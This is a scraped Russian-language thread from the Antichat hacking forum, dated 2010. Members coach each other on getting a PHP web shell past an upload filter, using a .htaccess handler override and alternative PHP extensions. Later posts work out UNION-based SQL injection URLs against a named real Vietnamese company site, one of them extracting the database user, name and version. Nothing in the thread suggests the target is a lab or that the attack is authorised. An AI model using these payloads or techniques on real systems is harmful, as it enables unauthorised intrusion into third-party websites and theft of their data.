Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

01.06.2010, 18:00
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме: 217423
Репутация:
32
|
|
Сообщение от Konqi
Iceangel_ спасибо за отзыв, не понял только одно ,какую роль здесь может играть htaccess?
С помощью htaccess можно переопределить средства интерпритирования файлов с определенным расширением.
Например: если в твоем случае есть доступ к файловой системе  заливаешь туда htaccess (в директорию куда кладутся залитые картинки), который содержит код, предложенный Iceangel_ и льеш свой шелл с расширением jpg. Фильтрацию по расширению обойдешь и шелл будет работать.
|
|
|

01.06.2010, 18:57
|
|
Участник форума
Регистрация: 22.10.2007
Сообщений: 159
Провел на форуме: 721727
Репутация:
397
|
|
Это лиш в том случае если хтакцесса нет в корне где уже описаны правила обработки интерпретатором...
|
|
|

01.06.2010, 19:00
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме: 5011696
Репутация:
2221
|
|
30 % что зальёться .htaccess  Т.к. если он уже php режет, это уже значит фильтрация.
// o_OPS Теория фильтрации fail. 30 %
И 95 % что сам .htaccess проканает. Т.к. не всегда .htaccess
Да и кто знает, мб там .htaccess лежит :O
Кстате DSU, IceAngel_ прав, если даже .htaccess в главной сказал мол jpg текст, то он в своей уже удаляет это правило, и создаёт новое.
Последний раз редактировалось Ctacok; 01.06.2010 в 19:54..
|
|
|

01.06.2010, 19:23
|
|
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме: 7561206
Репутация:
1861
|
|
Сообщение от [ DSU ]
Это лиш в том случае если хтакцесса нет в корне где уже описаны правила обработки интерпретатором...
Сомневаюсь. Можно пример такого .htaccess`а ?
З.Ы.
Заранее прошу обратить внимание на директиву RemoveHandler в моем примере.
Последний раз редактировалось Iceangel_; 01.06.2010 в 19:28..
|
|
|

02.06.2010, 03:01
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме: 599789
Репутация:
227
|
|
Цитата:
Сообщение от [ DSU ]
Это лиш в том случае если хтакцесса нет в корне где уже описаны правила обработки интерпретатором...
Сомневаюсь. Можно пример такого .htaccess`а ?
З.Ы.
Заранее прошу обратить внимание на директиву RemoveHandler в моем примере.
я думаю он имел ввиду, что может не хватить прав на перезапись хтаксеса, если он там уже лежит 
|
|
|

02.06.2010, 11:17
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме: 217423
Репутация:
32
|
|
Сообщение от Konqi
ребят в админке есть место для загрузки картинок,стоит фильтр,не могу загрузить php файл.. переименовал файл в php.jpg ,файл загрузилось,но не интерпретируется..
есть еще методы обхода фильтрации?
С htaccess-ом конечно интересно, но если php.jpg загрузился, то значит фильтрация по расширению. Скорей всего фильтрация расширений по типу "разрешено все, что не запрещено". Попробуй пихнуть что-то типа php.222 и если прокатит, то пробуй все возможные расширения, которые интерпретируются как php. Например: .php3 .php .phtml .php4 .php5
Можете че и забыли в фильтре написать.
|
|
|

02.06.2010, 13:04
|
|
Новичок
Регистрация: 27.05.2010
Сообщений: 13
Провел на форуме: 20441
Репутация:
0
|
|
Запретный ошибке
Привет группы;
Как мы можем получить таблицу с этого сайта, то посмотрим Запретный
http://www.hoanganjsc.com.vn/product.php?prodid=-90%20union%20select%201,2,3,4,5,6,7,8,9,10,11,1,2, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33%20--
Вьетнамский сайте
|
|
|

02.06.2010, 13:41
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме: 217423
Репутация:
32
|
|
Сообщение от haito
Привет группы;
Как мы можем получить таблицу с этого сайта, то посмотрим Запретный
http://www.hoanganjsc.com.vn/product.php?prodid=-90%20union%20select%201,2,3,4,5,6,7,8,9,10,11,1,2, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33%20--
Вьетнамский сайте
И откуда ты взял во втором selectе 33 столбца? Для параметра prodid правильный запрос будет
Код:
http://www.hoanganjsc.com.vn/product.php?prodid=-90+union+all+select+1,2,3,4--+
|
|
|

02.06.2010, 13:56
|
|
Новичок
Регистрация: 27.05.2010
Сообщений: 13
Провел на форуме: 20441
Репутация:
0
|
|
Сообщение от mr.celt
И откуда ты взял во втором selectе 33 столбца? Для параметра prodid правильный запрос будет
Код:
http://www.hoanganjsc.com.vn/product.php?prodid=-90+union+all+select+1,2,3,4--+
'33' я получил от "order by"
http://www.hoanganjsc.com.vn/product.php?prodid=90%20order%20by%2034-- <-- Ошибка
мы можем придать таблице этого сайта, потому что сайт не показал какой-либо номер для инъекций?
|
|
|

02.06.2010, 14:06
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
Сообщение от mr.celt
И откуда ты взял во втором selectе 33 столбца? Для параметра prodid правильный запрос будет
Код:
http://www.hoanganjsc.com.vn/product.php?prodid=-90+union+all+select+1,2,3,4--+
всё он верно сделал. Просто там несколько запросов
http://www.hoanganjsc.com.vn/product.php?prodid=-90/**/union/**/select/**/1,2,UNHEX(HEX(concat_ws(0x3a,User(),Database(),Ver sion()))),4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33--
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|